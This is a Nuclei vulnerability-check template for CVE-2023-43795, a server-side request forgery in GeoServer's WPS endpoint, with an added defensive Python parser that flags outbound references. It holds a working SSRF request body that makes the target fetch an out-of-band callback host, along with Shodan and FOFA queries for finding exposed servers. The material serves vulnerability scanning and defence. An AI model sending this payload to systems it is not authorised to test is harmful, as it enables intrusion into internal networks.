GeoServer WPS - Server Side Request Forgery
ID: CVE-2023-43795
Severity: critical
Author: DhiyaneshDK
Tags: cve2023,cve,geoserver,ssrf,oast,oos,osgeo
Description
GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. The OGC Web Processing Service (WPS) specification is designed to process information from any server using GET and POST requests, which presents the opportunity for Server Side Request Forgery. This vulnerability has been patched in versions 2.22.5 and 2.23.2.
YAML Source
id: CVE-2023-43795

info:
  name: GeoServer WPS - Server Side Request Forgery
  author: DhiyaneshDK
  severity: critical
  description: |
    GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. The OGC Web Processing Service (WPS) specification is designed to process information from any server using GET and POST requests. This presents the opportunity for Server Side Request Forgery. This vulnerability has been patched in version 2.22.5 and 2.23.2.
  reference:
    - https://www.synacktiv.com/advisories/unauthenticated-server-side-request-forgery-crlf-injection-in-geoserver-wms.html
    - https://github.com/geoserver/geoserver/security/advisories/GHSA-5pr3-m5hm-9956
    - https://nvd.nist.gov/vuln/detail/CVE-2023-43795
    - https://github.com/20142995/sectool
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-43795
    cwe-id: CWE-918
    epss-score: 0.13101
    epss-percentile: 0.9552
    cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: osgeo
    product: geoserver
    shodan-query:
      - title:"GeoServer"
      - http.title:"geoserver"
    fofa-query:
      - app="GeoServer"
      - app="geoserver"
      - title="geoserver"
    google-query: intitle:"geoserver"
  tags: cve2023,cve,geoserver,ssrf,oast,oos,osgeo

variables:
  oast: "{{interactsh-url}}"
  string: "{{to_lower(rand_text_alpha(4))}}"
  value: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST {{path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version="1.0" encoding="UTF-8"?>
        <wps:Execute version="1.0.0" service="WPS"
            xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
            xmlns="http://www.opengis.net/wps/1.0.0"
            xmlns:wfs="http://www.opengis.net/wfs"
            xmlns:wps="http://www.opengis.net/wps/1.0.0"
            xmlns:ows="http://www.opengis.net/ows/1.1"
            xmlns:gml="http://www.opengis.net/gml"
            xmlns:ogc="http://www.opengis.net/ogc"
            xmlns:wcs="http://www.opengis.net/wcs/1.1.1"
            xmlns:xlink="http://www.w3.org/1999/xlink"
            xsi:schemaLocation="http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd">
          <ows:Identifier>JTS:area</ows:Identifier>
          <wps:DataInputs>
            <wps:Input>
              <ows:Identifier>geom</ows:Identifier>
              <wps:Reference mimeType="application/json" xlink:href="https://{{oast}}" method="GET">
                <wps:Header key="{{string}}" value="{{value}}"/>
              </wps:Reference>
            </wps:Input>
          </wps:DataInputs>
          <wps:ResponseForm>
            <wps:RawDataOutput>
              <ows:Identifier>result</ows:Identifier>
            </wps:RawDataOutput>
          </wps:ResponseForm>
        </wps:Execute>

    payloads:
      path:
        - /wms
        - /geoserver/wms

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'http')
          - contains_all(to_lower(interactsh_request), '{{string}}','{{value}}')
          - status_code == 200
        condition: and
# digest: 490a00463044022075befc61fbff576c5caf43457b825071ad39d8979e2e5efc112d1a5875c7a05002206c37eccb9dd0ebdf1e8f29698589808902f869462f0dcc80bf3644ee30989a9a:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is run with the Nuclei scanner. It sends the WPS Execute request above to /wms and /geoserver/wms and reports a match only when the target itself fetches the interactsh callback URL over HTTP, that callback carries the two random header values from the request, and the server answers with status 200.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-43795.yaml"
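For defenders who want to spot this request shape at a reverse proxy or in captured traffic rather than wait for a scan, here is an added Python example (not part of the Nuclei template or of GeoServer) that parses a WPS 1.0.0 Execute body, lists every wps:Reference the server would fetch on the caller's behalf, and flags those whose host is not on an allowlist. The sample body and the allowlist host data.internal.example are constructed for the example.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Namespaces used by the WPS 1.0.0 Execute request shown in the template above.
WPS_NS = "http://www.opengis.net/wps/1.0.0"
OWS_NS = "http://www.opengis.net/ows/1.1"
XLINK_NS = "http://www.w3.org/1999/xlink"

# Constructed sample: same shape as the template's body, with a loopback target
# in place of the interactsh callback. It is not traffic captured from any host.
SAMPLE_EXECUTE = """<?xml version="1.0" encoding="UTF-8"?>
<wps:Execute version="1.0.0" service="WPS" xmlns="http://www.opengis.net/wps/1.0.0"
    xmlns:wps="http://www.opengis.net/wps/1.0.0" xmlns:ows="http://www.opengis.net/ows/1.1"
    xmlns:xlink="http://www.w3.org/1999/xlink">
  <ows:Identifier>JTS:area</ows:Identifier>
  <wps:DataInputs>
    <wps:Input>
      <ows:Identifier>geom</ows:Identifier>
      <wps:Reference mimeType="application/json" xlink:href="http://127.0.0.1:8080/" method="GET">
        <wps:Header key="abcd" value="efghi"/>
      </wps:Reference>
    </wps:Input>
  </wps:DataInputs>
</wps:Execute>"""


def find_wps_references(body: str):
    """Return (input id, href, method, headers) for every wps:Reference in an Execute body.
    xml.etree does not resolve external entities, so parsing untrusted input here makes no requests."""
    root = ET.fromstring(body)
    found = []
    for inp in root.iter(f"{{{WPS_NS}}}Input"):
        ident = inp.findtext(f"{{{OWS_NS}}}Identifier", default="")
        for ref in inp.iter(f"{{{WPS_NS}}}Reference"):
            headers = {h.get("key"): h.get("value") for h in ref.iter(f"{{{WPS_NS}}}Header")}
            found.append((ident, ref.get(f"{{{XLINK_NS}}}href", ""), ref.get("method", "GET"), headers))
    return found


def external_references(body: str, allowed_hosts):
    """References whose target host is not allowlisted: the fetches to block or alert on.
    Hostnames are compared literally; resolve them first if the allowlist is by address."""
    allowed = {h.lower() for h in allowed_hosts}
    return [r for r in find_wps_references(body)
            if (urlparse(r[1]).hostname or "").lower() not in allowed]


if __name__ == "__main__":
    for ident, href, method, headers in external_references(SAMPLE_EXECUTE, {"data.internal.example"}):
        print(f"flagged input {ident!r}: {method} {href} headers={headers}")
```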